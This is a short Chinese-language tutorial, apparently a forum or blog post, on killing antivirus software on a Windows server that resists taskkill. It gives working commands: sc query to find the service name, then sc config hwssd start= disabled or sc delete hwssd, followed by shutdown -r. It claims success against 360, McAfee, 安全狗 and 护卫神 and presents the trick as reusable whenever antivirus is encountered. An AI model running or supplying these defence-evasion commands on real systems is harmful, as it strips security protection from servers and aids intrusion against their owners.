通常情况下会使用 takskill /f /pid 进程号
来结束掉某某杀毒,但是会发现杀毒结束不掉,要么就是结束掉了立马又出现了
下面 无视保护进程
------------------------------------------------------------------------------------------------------------------
原理其实就是利用关闭服务或者删除服务来kill掉杀毒
首先在CMD中输入sc query 来查询杀毒的服务名称
出现以下回显:
SERVICE_NAME: hwssd DISPLAY_NAME: 护卫神杀毒 TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0
可以看到用的是护卫神杀毒,那么下面来把它解决掉 注:SERVICE_NAME即我们要用到的服务名
方法一:sc config “服务名” start= disabled (如果服务名中间有空格,就需要前后加引号)
exp:sc config hwssd start= disabled
这条命令是把护卫神杀毒这个服务的启动项改为禁止,然后输入shutdown -r重启服务器你就会发现护卫神杀毒没有了
如果说第一种方法行不通的话可以用第二种方法
方法二;sc delete “服务名” (如果服务名中间有空格,就需要前后加引号)
exp:sc delete hwssd
这条命令是把护卫神杀毒这个服务的启动项删除掉,然后输入shutdown -r重启服务器你就会发现护卫神杀毒没有了
以上两种方法经过测试,可以干掉安全狗,护卫神,360,麦咖啡等杀毒
有些杀毒的服务项比较多,那么挨个利用上面的方法把它干掉就OK了,以后如果碰到杀毒可以用这种方法,屡试不爽